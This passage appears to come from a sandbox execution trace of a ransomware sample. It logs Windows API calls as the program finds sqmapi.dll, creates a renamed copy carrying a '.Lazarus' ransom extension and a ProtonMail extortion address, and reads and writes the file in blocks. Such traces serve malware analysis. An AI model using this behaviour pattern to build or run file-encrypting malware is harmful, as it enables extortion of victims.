hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0081.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0081.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0081.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.395] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0081.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.396] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.396] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.396] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x1, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0081.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0081.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0081.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0081.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0081.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0081.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0081.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0081.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0081.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0081.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.410] AreFileApisANSI () returned 1 [0081.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\sqmapi.dll", lpUsedDefaultChar=0x0) returned 33 [0081.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0081.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0081.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0081.421] AreFileApisANSI () returned 1 [0081.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.421] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68f40 [0081.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0081.421] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.421] GetFileType (hFile=0x42c) returned 0x1 [0081.421] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0081.421] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0081.421] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0081.422] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0081.422] CloseHandle (hObject=0x42c) returned 1 [0081.422] AreFileApisANSI () returned 1 [0081.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x690d0 [0081.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0081.422] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.422] GetFileType (hFile=0x42c) returned 0x1 [0081.422] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0081.422] CloseHandle (hObject=0x42c) returned 1 [0081.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.423] AreFileApisANSI () returned 1 [0081.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.423] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x694e0 [0081.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0081.423] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420)) returned 1 [0081.423] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0081.423] AreFileApisANSI () returned 1 [0081.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0081.424] GetLastError () returned 0x0 [0081.424] SetLastError (dwErrCode=0x0) [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0081.424] GetLastError () returned 0x0 [0081.424] SetLastError (dwErrCode=0x0) [0081.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69210 [0081.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76020 [0081.424] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0081.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0081.424] AreFileApisANSI () returned 1 [0081.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0081.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=95 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 95 [0081.425] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.425] GetFileType (hFile=0x42c) returned 0x1 [0081.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0081.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0081.425] AreFileApisANSI () returned 1 [0081.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69490 [0081.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\sqmapi.dll") returned 33 [0081.426] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\sqmapi.dll" (normalized: "c:\\588bce7c90097ed212\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.426] GetFileType (hFile=0x428) returned 0x1 [0081.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0081.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0081.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0081.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.426] GetLastError () returned 0x0 [0081.426] SetLastError (dwErrCode=0x0) [0081.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.426] GetLastError () returned 0x0 [0081.426] SetLastError (dwErrCode=0x0) [0081.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.426] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0081.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0081.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0081.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0081.428] GetLastError () returned 0x0 [0081.428] SetLastError (dwErrCode=0x0) [0081.428] GetLastError () returned 0x0 [0081.428] SetLastError (dwErrCode=0x0) [0081.428] GetLastError () returned 0x0 [0081.428] SetLastError (dwErrCode=0x0) [0081.428] GetLastError () returned 0x0 [0081.428] SetLastError (dwErrCode=0x0) [0081.429] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.429] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.431] GetLastError () returned 0x0 [0081.431] SetLastError (dwErrCode=0x0) [0081.431] GetLastError () returned 0x0 [0081.431] SetLastError (dwErrCode=0x0) [0081.431] GetLastError () returned 0x0 [0081.431] SetLastError (dwErrCode=0x0) [0081.431] GetLastError () returned 0x0 [0081.431] SetLastError (dwErrCode=0x0) [0081.431] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.431] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.432] GetLastError () returned 0x0 [0081.432] SetLastError (dwErrCode=0x0) [0081.432] GetLastError () returned 0x0 [0081.432] SetLastError (dwErrCode=0x0) [0081.432] GetLastError () returned 0x0 [0081.432] SetLastError (dwErrCode=0x0) [0081.432] GetLastError () returned 0x0 [0081.432] SetLastError (dwErrCode=0x0) [0081.432] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.432] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.433] GetLastError () returned 0x0 [0081.433] SetLastError (dwErrCode=0x0) [0081.433] GetLastError () returned 0x0 [0081.433] SetLastError (dwErrCode=0x0) [0081.433] GetLastError () returned 0x0 [0081.433] SetLastError (dwErrCode=0x0) [0081.433] GetLastError () returned 0x0 [0081.433] SetLastError (dwErrCode=0x0) [0081.433] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.433] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.433] GetLastError () returned 0x0 [0081.433] SetLastError (dwErrCode=0x0) [0081.434] GetLastError () returned 0x0 [0081.434] SetLastError (dwErrCode=0x0) [0081.434] GetLastError () returned 0x0 [0081.434] SetLastError (dwErrCode=0x0) [0081.434] GetLastError () returned 0x0 [0081.434] SetLastError (dwErrCode=0x0) [0081.434] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.434] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.434] GetLastError () returned 0x0 [0081.434] SetLastError (dwErrCode=0x0) [0081.434] GetLastError () returned 0x0 [0081.434] SetLastError (dwErrCode=0x0) [0081.434] GetLastError () returned 0x0 [0081.435] SetLastError (dwErrCode=0x0) [0081.435] GetLastError () returned 0x0 [0081.435] SetLastError (dwErrCode=0x0) [0081.435] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.435] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.435] GetLastError () returned 0x0 [0081.435] SetLastError (dwErrCode=0x0) [0081.435] GetLastError () returned 0x0 [0081.435] SetLastError (dwErrCode=0x0) [0081.435] GetLastError () returned 0x0 [0081.435] SetLastError (dwErrCode=0x0) [0081.435] GetLastError () returned 0x0 [0081.436] SetLastError (dwErrCode=0x0) [0081.436] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.436] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.436] GetLastError () returned 0x0 [0081.436] SetLastError (dwErrCode=0x0) [0081.436] GetLastError () returned 0x0 [0081.436] SetLastError (dwErrCode=0x0) [0081.436] GetLastError () returned 0x0 [0081.436] SetLastError (dwErrCode=0x0) [0081.436] GetLastError () returned 0x0 [0081.436] SetLastError (dwErrCode=0x0) [0081.437] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.437] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.437] GetLastError () returned 0x0 [0081.437] SetLastError (dwErrCode=0x0) [0081.437] GetLastError () returned 0x0 [0081.437] SetLastError (dwErrCode=0x0) [0081.437] GetLastError () returned 0x0 [0081.437] SetLastError (dwErrCode=0x0) [0081.437] GetLastError () returned 0x0 [0081.437] SetLastError (dwErrCode=0x0) [0081.437] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, 